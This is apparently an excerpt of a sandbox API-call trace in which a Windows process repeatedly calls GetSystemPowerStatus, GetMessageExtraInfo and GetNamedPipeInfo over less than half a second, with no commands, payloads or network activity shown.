	[0129.502] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.502] GetMessageExtraInfo () returned 0x0
	[0129.503] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.503] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.503] GetMessageExtraInfo () returned 0x0
	[0129.503] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.503] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.503] GetMessageExtraInfo () returned 0x0
	[0129.509] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.509] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.509] GetMessageExtraInfo () returned 0x0
	[0129.510] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.510] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.510] GetMessageExtraInfo () returned 0x0
	[0129.604] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.604] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.604] GetMessageExtraInfo () returned 0x0
	[0129.673] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.673] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.673] GetMessageExtraInfo () returned 0x0
	[0129.693] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.693] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.693] GetMessageExtraInfo () returned 0x0
	[0129.704] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.704] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.705] GetMessageExtraInfo () returned 0x0
	[0129.744] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.744] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.744] GetMessageExtraInfo () returned 0x0
	[0129.748] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.748] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.748] GetMessageExtraInfo () returned 0x0
	[0129.749] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.749] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.749] GetMessageExtraInfo () returned 0x0
	[0129.756] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.756] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.756] GetMessageExtraInfo () returned 0x0
	[0129.764] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.765] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.765] GetMessageExtraInfo () returned 0x0
	[0129.766] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.766] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.766] GetMessageExtraInfo () returned 0x0
	[0129.770] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.770] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.770] GetMessageExtraInfo () returned 0x0
	[0129.770] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.770] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.770] GetMessageExtraInfo () returned 0x0
	[0129.771] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.771] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.771] GetMessageExtraInfo () returned 0x0
	[0129.774] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.774] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.774] GetMessageExtraInfo () returned 0x0
	[0129.775] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.775] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.775] GetMessageExtraInfo () returned 0x0
	[0129.775] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.775] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.775] GetMessageExtraInfo () returned 0x0
	[0129.776] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.776] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.776] GetMessageExtraInfo () returned 0x0
	[0129.780] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.782] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.782] GetMessageExtraInfo () returned 0x0
	[0129.782] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.782] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.782] GetMessageExtraInfo () returned 0x0
	[0129.783] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.783] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.783] GetMessageExtraInfo () returned 0x0
	[0129.800] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.800] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.800] GetMessageExtraInfo () returned 0x0
	[0129.801] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.801] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.801] GetMessageExtraInfo () returned 0x0
	[0129.802] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.802] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.802] GetMessageExtraInfo () returned 0x0
	[0129.803] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.803] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.803] GetMessageExtraInfo () returned 0x0
	[0129.803] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.803] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.803] GetMessageExtraInfo () returned 0x0
	[0129.804] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.804] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.804] GetMessageExtraInfo () returned 0x0
	[0129.805] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.805] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.805] GetMessageExtraInfo () returned 0x0
	[0129.805] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.805] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.805] GetMessageExtraInfo () returned 0x0
	[0129.807] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.807] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.807] GetMessageExtraInfo () returned 0x0
	[0129.807] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.807] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.807] GetMessageExtraInfo () returned 0x0
	[0129.808] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.808] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.808] GetMessageExtraInfo () returned 0x0
	[0129.809] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.809] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.809] GetMessageExtraInfo () returned 0x0
	[0129.809] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.809] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.809] GetMessageExtraInfo () returned 0x0
	[0129.817] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.817] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.817] GetMessageExtraInfo () returned 0x0
	[0129.819] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.819] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.819] GetMessageExtraInfo () returned 0x0
	[0129.820] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.820] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.820] GetMessageExtraInfo () returned 0x0
	[0129.820] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.820] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.820] GetMessageExtraInfo () returned 0x0
	[0129.847] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.847] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.848] GetMessageExtraInfo () returned 0x0
	[0129.848] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.848] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.848] GetMessageExtraInfo () returned 0x0
	[0129.849] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.849] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.849] GetMessageExtraInfo () returned 0x0
	[0129.849] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.849] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.849] GetMessageExtraInfo () returned 0x0
	[0129.850] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.850] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.850] GetMessageExtraInfo () returned 0x0
	[0129.850] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.850] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.850] GetMessageExtraInfo () returned 0x0
	[0129.851] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.851] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.851] GetMessageExtraInfo () returned 0x0
	[0129.851] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.851] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.851] GetMessageExtraInfo () returned 0x0
	[0129.852] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.852] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.852] GetMessageExtraInfo () returned 0x0
	[0129.853] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.853] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.853] GetMessageExtraInfo () returned 0x0
	[0129.854] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.854] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.854] GetMessageExtraInfo () returned 0x0
	[0129.854] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.854] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.854] GetMessageExtraInfo () returned 0x0
	[0129.856] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.856] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.856] GetMessageExtraInfo () returned 0x0
	[0129.856] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.856] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.856] GetMessageExtraInfo () returned 0x0
	[0129.857] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.857] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.857] GetMessageExtraInfo () returned 0x0
	[0129.858] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.858] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.858] GetMessageExtraInfo () returned 0x0
	[0129.858] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.858] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.858] GetMessageExtraInfo () returned 0x0
	[0129.861] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.861] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.861] GetMessageExtraInfo () returned 0x0
	[0129.861] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.862] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.862] GetMessageExtraInfo () returned 0x0
	[0129.862] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.862] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.862] GetMessageExtraInfo () returned 0x0
	[0129.864] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.864] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.864] GetMessageExtraInfo () returned 0x0
	[0129.864] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.864] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.864] GetMessageExtraInfo () returned 0x0
	[0129.875] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
